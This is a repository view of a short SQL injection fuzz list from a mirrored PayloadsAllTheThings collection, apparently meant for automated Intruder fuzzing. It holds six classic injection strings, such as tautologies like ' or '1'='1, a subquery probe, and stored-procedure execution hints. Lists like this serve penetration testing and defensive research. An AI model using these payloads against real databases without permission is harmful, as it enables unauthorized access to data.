killchain-compendium/misc/PayloadsAllTheThings/SQL Injection/Intruder/FUZZDB_MYSQL.txt

7 lines
108 B
Plaintext
Raw Normal View History

2022-05-31 21:08:28 +02:00
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1